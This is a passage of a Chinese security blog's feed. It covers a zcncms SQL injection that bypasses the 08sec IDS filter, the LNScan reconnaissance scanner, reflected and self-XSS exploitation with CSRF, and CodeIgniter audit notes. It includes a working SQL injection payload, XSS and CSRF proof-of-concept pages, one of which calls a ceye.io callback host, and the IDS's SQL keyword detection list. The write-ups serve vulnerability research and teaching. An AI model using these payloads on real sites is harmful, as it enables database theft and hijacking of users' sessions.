class="string">'\''</span>, $pos + <span class="number">1</span>);</span><br><span class="line"> $pos2 = strpos($db_string, <span class="string">'\\'</span>, $pos + <span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span> ($pos1 === <span class="keyword">false</span>)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">elseif</span> ($pos2 == <span class="keyword">false</span> || $pos2 > $pos1)</span><br><span class="line"> {</span><br><span class="line"> $pos = $pos1;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> $pos = $pos2 + <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> $clean .= <span class="string">'$s$'</span>;</span><br><span class="line"> $old_pos = $pos + <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> $clean .= substr($db_string, $old_pos);</span><br><span class="line"> $clean = trim(strtolower(preg_replace(<span class="keyword">array</span>(<span class="string">'~\s+~s'</span> ), <span class="keyword">array</span>(<span class="string">' '</span>), $clean)));</span><br><span class="line"></span><br><span class="line"> <span class="comment">//老版本的Mysql并不支持union,常用的程序里也不使用union,但是一些黑客使用它,所以检查它</span></span><br><span class="line"> <span class="keyword">if</span> (strpos($clean, <span class="string">'union'</span>) !== <span class="keyword">false</span> && preg_match(<span class="string">'~(^|[^a-z])union($|[^[a-z])~s'</span>, $clean) != <span class="number">0</span>)</span><br><span class="line"> {</span><br><span class="line"> $fail = <span class="keyword">true</span>;</span><br><span class="line"> $error=<span class="string">"union detect"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">//发布版本的程序可能比较少包括--,#这样的注释,但是黑客经常使用它们</span></span><br><span class="line"> <span class="keyword">elseif</span> (strpos($clean, <span class="string">'/*'</span>) > <span class="number">2</span> || strpos($clean, <span class="string">'--'</span>) !== <span class="keyword">false</span> || strpos($clean, <span class="string">'#'</span>) !== <span class="keyword">false</span>)</span><br><span class="line"> {</span><br><span class="line"> $fail = <span class="keyword">true</span>;</span><br><span class="line"> $error=<span class="string">"comment detect"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">//这些函数不会被使用,但是黑客会用它来操作文件,down掉数据库</span></span><br><span class="line"> <span class="keyword">elseif</span> (strpos($clean, <span class="string">'sleep'</span>) !== <span class="keyword">false</span> && preg_match(<span class="string">'~(^|[^a-z])sleep($|[^[a-z])~s'</span>, $clean) != <span class="number">0</span>)</span><br><span class="line"> {</span><br><span class="line"> $fail = <span class="keyword">true</span>;</span><br><span class="line"> $error=<span class="string">"slown down detect"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">elseif</span> (strpos($clean, <span class="string">'benchmark'</span>) !== <span class="keyword">false</span> && preg_match(<span class="string">'~(^|[^a-z])benchmark($|[^[a-z])~s'</span>, $clean) != <span class="number">0</span>)</span><br><span class="line"> {</span><br><span class="line"> $fail = <span class="keyword">true</span>;</span><br><span class="line"> $error=<span class="string">"slown down detect"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">elseif</span> (strpos($clean, <span class="string">'load_file'</span>) !== <span class="keyword">false</span> && preg_match(<span class="string">'~(^|[^a-z])load_file($|[^[a-z])~s'</span>, $clean) != <span class="number">0</span>)</span><br><span class="line"> {</span><br><span class="line"> $fail = <span class="keyword">true</span>;</span><br><span class="line"> $error=<span class="string">"file fun detect"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">elseif</span> (strpos($clean, <span class="string">'into outfile'</span>) !== <span class="keyword">false</span> && preg_match(<span class="string">'~(^|[^a-z])into\s+outfile($|[^[a-z])~s'</span>, $clean) != <span class="number">0</span>)</span><br><span class="line"> {</span><br><span class="line"> $fail = <span class="keyword">true</span>;</span><br><span class="line"> $error=<span class="string">"file fun detect"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">//老版本的MYSQL不支持子查询,我们的程序里可能也用得少,但是黑客可以使用它来查询数据库敏感信息</span></span><br><span class="line"> <span class="keyword">elseif</span> (preg_match(<span class="string">'~\([^)]*?select~s'</span>, $clean) != <span class="number">0</span>)</span><br><span class="line"> {</span><br><span class="line"> $fail = <span class="keyword">true</span>;</span><br><span class="line"> $error=<span class="string">"sub select detect"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (!<span class="keyword">empty</span>($fail))</span><br><span class="line"> {</span><br><span class="line"> <span class="comment">//fputs(fopen($log_file,'a+'),"$userIP||$getUrl||$db_string||$error\r\n");</span></span><br><span class="line"> <span class="keyword">exit</span>(<span class="string">"<font size='5' color='red'>Safe Alert: Request Error step 2!</font>"</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">return</span> $db_string;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure></p>
<p>从代码和警告信息来看,是08sec的通用ids无疑,包括dedecms等内置这个这段代码。网上已经有较多的绕过方式。<br>构造payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">zcncms/admin/?c=products_class&a=edit&id=1</span><br><span class="line">POST:</span><br><span class="line">submit=&parentid=12=@`\\\'` and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1));#@`\\\'`</span><br></pre></td></tr></table></figure></p>
<p><img src="https://img.alicdn.com/imgextra/i3/792076116/TB27vUOtVXXXXaOXpXXXXXXXXXX_!!792076116.png" alt=""></p>
<h4 id="0x04-多处类似处理不当"><a href="#0x04-多处类似处理不当" class="headerlink" title="0x04 多处类似处理不当"></a>0x04 多处类似处理不当</h4><p>搜索了一下代码,发现多处parentid处理不当,不过都需要后台权限</p>
<p><img src="https://img.alicdn.com/imgextra/i3/792076116/TB2vro2tVXXXXXRXpXXXXXXXXXX_!!792076116.png" alt=""></p>
]]></content>
<summary type="html">
<p>由于是后台注入,比较鸡肋,发上来供大家相互参考学习。zcncms版本1.2.14,官方网站地址:<br><a href="http://www.zcncms.com/">zcncms</a>
</summary>
<category term="代码审计" scheme="http://wps2015.org/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="php" scheme="http://wps2015.org/tags/php/"/>
</entry>
<entry>
<title>LNScan--一个高效的信息探测脚本</title>
<link href="http://wps2015.org/2016/07/28/LNScan/"/>
<id>http://wps2015.org/2016/07/28/LNScan/</id>
<published>2016-07-27T16:00:00.000Z</published>
<updated>2016-11-09T03:45:11.125Z</updated>
<content type="html"><![CDATA[<h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>对于信息安全工作者,快速了解一个ip段、ip列表或者域名列表的信息(端口、标题、敏感文件等),是进行安全检测的重要一环,LNScan正是为此而生,敏感文件扫描模块改自<a href="https://github.com/lijiejie/BBScan" target="_blank" rel="external">BBScan</a>.</p>
<a id="more"></a>
<h3 id="特点"><a href="#特点" class="headerlink" title="特点"></a>特点</h3><ul>
<li><p>快速高效,多进程 + 多线程结合</p>
</li>
<li><p>支持指定ip段,或者文件导入(ip/域名)</p>
</li>
<li><p>敏感文件扫描支持多web端口</p>
</li>
<li><p>扫描结束后生成格式鲜明的html报告,方便查看</p>
</li>
</ul>
<p>扫描报告如下图:</p>
<p><img src="https://img.alicdn.com/imgextra/i3/792076116/TB2SbKbtFXXXXaeXpXXXXXXXXXX_!!792076116.png" alt=""></p>
<h3 id="流程"><a href="#流程" class="headerlink" title="流程"></a>流程</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">ip段/文件 => title&常见端口扫描 => 提取web端口 => 敏感文件扫描 => 生成report</span><br></pre></td></tr></table></figure>
<h3 id="改进"><a href="#改进" class="headerlink" title="改进"></a>改进</h3><p>对一个大型的企业来说,使用layer等工具扫描二级域名,获取的ip/域名并不完全;若发现很多子域名分布在不同的C段,那么针对每个C段扫描就显得任务很重。本工具计划针对导入的ip/域名,进行人为的ip扩展(前后相邻ip或者利用掩码划分更小的段),更大限度的命中目标企业ip。</p>
<hr>
<p><strong>最新进展</strong></p>
<ol>
<li>ip扩展完成,可利用<code>"--extend num"</code>指令,进行指定小子网的ip扩展,如<code>"--extend 30"</code>;主要针对利用<code>-f</code>文件导入的方式;</li>
</ol>
<h3 id="地址"><a href="#地址" class="headerlink" title="地址"></a>地址</h3><p><a href="https://github.com/sowish/LNScan" target="_blank" rel="external">LNScan传送门</a></p>
]]></content>
<summary type="html">
<h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>对于信息安全工作者,快速了解一个ip段、ip列表或者域名列表的信息(端口、标题、敏感文件等),是进行安全检测的重要一环,LNScan正是为此而生,敏感文件扫描模块改自<a href="https://github.com/lijiejie/BBScan">BBScan</a>.</p>
</summary>
<category term="神器而已" scheme="http://wps2015.org/categories/%E7%A5%9E%E5%99%A8%E8%80%8C%E5%B7%B2/"/>
<category term="python" scheme="http://wps2015.org/tags/python/"/>
</entry>
<entry>
<title>不常见的xss利用探索</title>
<link href="http://wps2015.org/2016/06/27/unusual-xss/"/>
<id>http://wps2015.org/2016/06/27/unusual-xss/</id>
<published>2016-06-26T16:00:00.000Z</published>
<updated>2016-07-08T02:02:56.260Z</updated>
<content type="html"><![CDATA[<h3 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 前言"></a>0x01 前言</h3><p>反射型xss,相对于持久型xss来说比较鸡肋;需要欺骗用户点击构造好的链接,达到窃取cookie,或是进一步CSRF劫持用户操作的目的。若是get型的xss,javascript代码直接在url中,虽然有些怪异,也好歹能用,愿者上钩。<a id="more"></a>但是若js代码是在post数据包,或者是在header里,那就更显得鸡肋了,甚至无法利用。我查阅了大量的资料,有了下面的尝试。</p>
<h3 id="0x02-POST型反射xss"><a href="#0x02-POST型反射xss" class="headerlink" title="0x02 POST型反射xss"></a>0x02 POST型反射xss</h3><p>对于post反射型xss,其实已经有比较成熟的利用方法:构造post表单,利用js直接提交。表单构造如下:<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"><span class="tag"><<span class="name">form</span> <span class="attr">name</span>=<span class="string">"form"</span> <span class="attr">id</span>=<span class="string">"form1"</span> <span class="attr">method</span>=<span class="string">"post"</span> <span class="attr">action</span>=<span class="string">"http://target.com/test.php"</span>></span></span><br><span class="line"><span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"searchKey"</span> <span class="attr">hidden</span>=<span class="string">"true"</span> <span class="attr">value</span>=<span class="string">'test"><img src=1 onerror=alert(document.domain)>'</span>/></span></span><br><span class="line"><span class="tag"></<span class="name">form</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="javascript"></span><br><span class="line"><span class="built_in">document</span>.getElementById(<span class="string">'form1'</span>).submit();</span><br><span class="line"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure></p>
<p>将html保存后,诱导被攻击者访问这个html文件,触发如下:<br><img src="https://img.alicdn.com/imgextra/i1/792076116/TB2e_kZrVXXXXabXpXXXXXXXXXX_!!792076116.png" alt="post"></p>
<h3 id="0x03-http头部反射xss"><a href="#0x03-http头部反射xss" class="headerlink" title="0x03 http头部反射xss"></a>0x03 http头部反射xss</h3><p>如果xss代码的输入点是在http头部的话,那么利用表单提交的方法就不行。利用ajax异步跨域请求的方法等会再谈,先说说一个比较特殊的头信息<code>referer</code>。</p>
<h4 id="referer头信息xss"><a href="#referer头信息xss" class="headerlink" title="referer头信息xss"></a>referer头信息xss</h4><p>当浏览器进行跳转时,一般会将前一个页面的url带入referer头部中,如果我们控制了跳转前的url,并使之跳转到target页面,那么referer头的xss漏洞便可以利用。当然,chrome和firefox会对跳转前url里的”<>”等进行urlencode,但是IE却不会,所以这种方法在IE下适用。漏洞页面如下:<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="number">123</span>;</span><br><span class="line"><span class="keyword">echo</span> $_SERVER[<span class="string">'HTTP_REFERER'</span>];</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure></p>
<p>简单的将referer信息输出,那么构造一个跳转:<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="javascript"></span><br><span class="line"><span class="built_in">window</span>.location.href=<span class="string">"http://target.com/xss_test/referer.php"</span>;</span><br><span class="line"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure></p>
<p>访问:<code>http://localhost:8088/test/header/referer_location.html?<script>alert(document.domain) </script></code>。在<code>IE11</code>上测试成功</p>
<p><img src="https://img.alicdn.com/imgextra/i3/792076116/TB2QcVdsXXXXXcuXXXXXXXXXXXX_!!792076116.png" alt="xss"></p>
<p>除了window.location跳转外,还可以利用iframe、表单提交等方式。利用<code>iframe</code>标签:<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">iframe</span> <span class="attr">src</span>=<span class="string">"http://target.com/xss_test/referer.php"</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure></p>
<p>利用<code>表单提交</code>的方式:<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">body</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">form</span> <span class="attr">id</span>=<span class="string">"xss"</span></span><br><span class="line"> <span class="attr">name</span>=<span class="string">"xss"</span></span><br><span class="line"> <span class="attr">method</span>=<span class="string">"GET"</span></span><br><span class="line"> <span class="attr">action</span>=<span class="string">"http://target.com/xss_test/referer.php"</span>></span></span><br><span class="line"> <span class="tag"></<span class="name">form</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">script</span>></span><span class="javascript"></span><br><span class="line"> <span class="built_in">document</span>.getElementById(<span class="string">"xss"</span>).submit();</span><br><span class="line"> </span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"> <span class="tag"></<span class="name">body</span>></span></span><br><span class="line"> <span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure></p>
<h4 id="对其他header的xss尝试"><a href="#对其他header的xss尝试" class="headerlink" title="对其他header的xss尝试"></a>对其他header的xss尝试</h4><p>如何让受害者点击某个链接后,访问漏洞页面并带上特定的header信息,ajax可以办到这点。由于需要跨域请求,这里参考了CORS(Cross Origin Resourse-Sharing)的模型。CORS模型实现跨域资源共享需要服务器端设置一定的返回头部,所以这里攻击场景就比较狭隘,仅做学术的研究。服务器端可设置的http头如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Access-Control-Allow-Origin: 允许跨域访问的域,可以是一个域的列表,也可以是通配符"*"。这里要注意Origin规则只对域名有效,并不会对子目录有效。即http://foo.example/subdir/是无效的。但是不同子域名需要分开设置,这里的规则可以参照那篇同源策略</span><br><span class="line">Access-Control-Allow-Credentials: 是否允许请求带有验证信息,这部分将会在下面详细解释</span><br><span class="line">Access-Control-Expose-Headers: 允许脚本访问的返回头,请求成功后,脚本可以在XMLHttpRequest中访问这些头的信息(貌似webkit没有实现这个)</span><br><span class="line">Access-Control-Max-Age: 缓存此次请求的秒数。在这个时间范围内,所有同类型的请求都将不再发送预检请求而是直接使用此次返回的头作为判断依据,非常有用,大幅优化请求次数</span><br><span class="line">Access-Control-Allow-Methods: 允许使用的请求方法,以逗号隔开</span><br><span class="line">Access-Control-Allow-Headers: 允许自定义的头部,以逗号隔开,大小写不敏感</span><br></pre></td></tr></table></figure></p>
<p>基于CORS模型,浏览器发起的ajax请求分为简单跨域请求和非简单跨域请求。简单跨域请求不需要服务器允许便可发起,但浏览器会阻止响应。服务器端的漏洞页面代码如下:<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">header(<span class="string">"Access-Control-Allow-Origin: *"</span>);</span><br><span class="line">header(<span class="string">"Access-Control-Allow-Headers: X-Forwarded-For, referer, Content-Type"</span>);</span><br><span class="line"><span class="keyword">echo</span> urldecode($_SERVER[<span class="string">'X-Forwarded-For'</span>]);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure></p>
<p>本地测试html代码如下,X-Forwarded-For设置为<code><html><script src=http://x_for.xxxx.ceye.io></script></html></code>,通过查看cloudeye上是否有dns请求记录验证标签是否被渲染。<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="javascript"></span><br><span class="line"><span class="keyword">var</span> xmlhttp;</span><br><span class="line"><span class="keyword">if</span> (<span class="built_in">window</span>.XMLHttpRequest)</span><br><span class="line"> {<span class="comment">// code for IE7+, Firefox, Chrome, Opera, Safari</span></span><br><span class="line"> xmlhttp=<span class="keyword">new</span> XMLHttpRequest();</span><br><span class="line"> }</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"> {<span class="comment">// code for IE6, IE5</span></span><br><span class="line"> xmlhttp=<span class="keyword">new</span> ActiveXObject(<span class="string">"Microsoft.XMLHTTP"</span>);</span><br><span class="line"> }</span><br><span class="line">xmlhttp.open(<span class="string">"POST"</span>,<span class="string">"http://taget.com/xss_test/cors.php"</span>,<span class="literal">true</span>);</span><br><span class="line">xmlhttp.setRequestHeader(<span class="string">"Content-Type"</span>,<span class="string">"application/x-www-form-urlencoded"</span>);</span><br><span class="line">xmlhttp.setRequestHeader(<span class="string">"X-Forwarded-For"</span>,<span class="string">"%3Chtml%3E%3Cscript%20src%3Dhttp%3A%2f%2fx_for.xxxx.ceye.io%3E%3C%2fscript%3E%3C%2fhtml%3E"</span>); <span class="comment">//若不加为简单跨域请求,无OPTIONS方法的预检请求</span></span><br><span class="line">xmlhttp.send(<span class="string">'data=123'</span>);</span><br><span class="line"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure></p>
<p>利用chrome打开测试页面,可以看到ajax请求发送成功,并且打开该ajax请求的Preview,可以看到似乎response的html代码被解析了。</p>
<p><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2VI8usXXXXXXgXpXXXXXXXXXX_!!792076116.png" alt="ajax"></p>
<p>script标签里的源是我的cloudeye地址,那么看看cloudeye里面是否有DNS记录,</p>
<p><img src="https://img.alicdn.com/imgextra/i3/792076116/TB2XvxKsXXXXXaYXXXXXXXXXXXX_!!792076116.png" alt="cloudeye"></p>
<p>DNS请求记录存在,说明html代码被浏览器解析了,到这里,似乎可以跨域触发基于header的xss了。但是经过进一步的验证过后,发现只是html代码被渲染,javascript代码却不能执行!!!</p>
<h3 id="0x04-self-xss"><a href="#0x04-self-xss" class="headerlink" title="0x04 self-xss"></a>0x04 self-xss</h3><p>self-xss可以说是最最鸡肋的xss了,攻击者只能在自己这里弹窗,一般厂商都会选择忽略self-xss。但self-xss如果和csrf结合起来,会有意想不到的效果。</p>
<blockquote>
<p>攻击场景: 某个站点个人简介处存在self-xss,并且保存后并不触发,再次编辑会触发。添加个人简介和编辑处存在csrf</p>
</blockquote>
<p>在这种场景下,有一个思路就是:利用csrf添加xss代码,并且让攻击者点击或者跳转触发。需要给被攻击者第一个链接用于csrf插入xss代码<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">body</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">form</span> <span class="attr">id</span>=<span class="string">"csrf"</span> <span class="attr">name</span>=<span class="string">"csrf"</span> <span class="attr">method</span>=<span class="string">"POST"</span> <span class="attr">action</span>=<span class="string">"http://target.com/info/add"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"name"</span> <span class="attr">value</span>=<span class="string">"csrf_test#<script>alert(document.domain)</script>"</span>></span></span><br><span class="line"> <span class="tag"></<span class="name">form</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">script</span>></span><span class="javascript"></span><br><span class="line"> <span class="built_in">document</span>.getElementById(<span class="string">"csrf"</span>).submit();</span><br><span class="line"> </span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"> <span class="tag"></<span class="name">body</span>></span></span><br><span class="line"> <span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure></p>
<p>再诱导被攻击者点击漏洞触发的链接:<code>http://target.com/info/edit</code>,亦或发送下面的跳转链接:<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="javascript"></span><br><span class="line"><span class="built_in">window</span>.location.href=<span class="string">"http://target.com/info/edit"</span></span><br><span class="line"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure></p>
<p>self-xss,结合csrf便可将鸡肋变成可攻击的漏洞。</p>
<p>参考文献:</p>
<p><a href="http://drops.wooyun.org/tips/188" target="_blank" rel="external">详解XMLHttpRequest的跨域资源共享</a></p>
<p><a href="http://zone.wooyun.org/content/11969" target="_blank" rel="external">header头referer字段反射xss利用</a></p>
]]></content>
<summary type="html">
<h3 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 前言"></a>0x01 前言</h3><p>反射型xss,相对于持久型xss来说比较鸡肋;需要欺骗用户点击构造好的链接,达到窃取cookie,或是进一步CSRF劫持用户操作的目的。若是get型的xss,javascript代码直接在url中,虽然有些怪异,也好歹能用,愿者上钩。
</summary>
<category term="Web安全" scheme="http://wps2015.org/categories/Web%E5%AE%89%E5%85%A8/"/>
<category term="xss" scheme="http://wps2015.org/tags/xss/"/>
</entry>
<entry>
<title>CI框架学习一(参数输入/数据库操作)</title>
<link href="http://wps2015.org/2016/05/19/learning-of-CI1/"/>
<id>http://wps2015.org/2016/05/19/learning-of-CI1/</id>
<published>2016-05-18T16:00:00.000Z</published>
<updated>2016-05-28T02:00:44.878Z</updated>
<content type="html"><![CDATA[<p>对于代码审计来讲,比较重要的是了解其参数输入及数据库操作方式。在阅读了CI开发手册后,我总结了下面的笔记。<br><a id="more"></a></p>
<h2 id="参数输入"><a href="#参数输入" class="headerlink" title="参数输入"></a>参数输入</h2><h4 id="1-CI自带输入类"><a href="#1-CI自带输入类" class="headerlink" title="1. CI自带输入类"></a>1. CI自带输入类</h4><p>输入类有两个用途:</p>
<blockquote>
<p>为了安全性,对输入数据进行预处理</p>
<p>提供了一些辅助方法来获取输入数据并处理</p>
</blockquote>
<p>在CI框架中,在/application/config/config.php中可以选择开启全局过滤xss</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$config['global_xss_filtering'] = TRUE;</span><br></pre></td></tr></table></figure>
<p>最常见调用方法如下,第二个参数为TRUE时,可加载xss_clean函数对输入的参数进行过滤,当然只是过滤xss,xss_clean函数定义在/system/core/Security.php,没有针对sql injection做对于的过滤措施。<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$this->input->post($index (mixed),[, $xss_clean = <span class="keyword">NULL</span>]])</span><br><span class="line">$this->input->get()</span><br><span class="line">$this->input->cookie()</span><br><span class="line">$this->input->server()</span><br></pre></td></tr></table></figure></p>
<p>其它的较少使用的如<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$this->input->get_post(<span class="string">'some_data'</span>, <span class="keyword">TRUE</span>); <span class="comment">//先get再post</span></span><br><span class="line">$this->input->post_get(<span class="string">'some_data'</span>, <span class="keyword">TRUE</span>);</span><br><span class="line">$this->input->ip_address();</span><br><span class="line">$this->input->user_agent();</span><br><span class="line">$this->input->request_headers();</span><br><span class="line">....</span><br></pre></td></tr></table></figure></p>
<h4 id="2-URI-分段传递"><a href="#2-URI-分段传递" class="headerlink" title="2. URI 分段传递"></a>2. URI 分段传递</h4><p>当URI多于两个段,多余的段将作为参数传递到你的方法中。例如你的URI是这样<br><code>/index.php/news/view/test</code><br>那么view方法会接受”test”作为参数。<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">view</span><span class="params">($slug = Null)</span></span><br><span class="line"></span>{</span><br><span class="line"> $data[<span class="string">'news'</span>] = $this->news_model->get_news($slug);</span><br><span class="line"> $data[<span class="string">'title'</span>] = <span class="string">"The detail news"</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">empty</span>($data[<span class="string">'news'</span>]))</span><br><span class="line"> {</span><br><span class="line"> show_404();</span><br><span class="line"> }</span><br><span class="line"> $this->load->view(<span class="string">'templates/header'</span>, $data);</span><br><span class="line"> $this->load->view(<span class="string">'news/index'</span>, $data);</span><br><span class="line"> $this->load->view(<span class="string">'templates/footer'</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<p>在/application/config/config.php中,定义了全局的URI参数<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$config['permitted_uri_chars'] = 'a-z 0-9~%.:_\-';</span><br></pre></td></tr></table></figure></p>
<p>开启后,可自定义允许的URI字符的白名单。利用这种方式传入的参数由于利用的是URI,不会被服务器urldecode,如果其他字符没有被过滤的话,可以用下面的语句测试是否注入: <code>(3)and(sleep(5))</code></p>
<h4 id="3-URI类方法获取"><a href="#3-URI类方法获取" class="headerlink" title="3. URI类方法获取"></a>3. URI类方法获取</h4><blockquote>
<p>最常用调用方法如下:</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$this->uri->segment(n, [, $no_result = NULL]))</span><br></pre></td></tr></table></figure>
<p>用于从 URI 中获取指定段。参数 n 为你希望获取的段序号,URI 的段从左到右进行编号。 例如,如果你的完整 URL 是这样的:<br><code>/index.php/news/view/test</code>,那么从index.php开始为0,要获取“test”值,代码如下<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$this->uri->segment(<span class="number">3</span>)</span><br></pre></td></tr></table></figure></p>
<blockquote>
<p>还有一个比较好用的方法</p>
</blockquote>
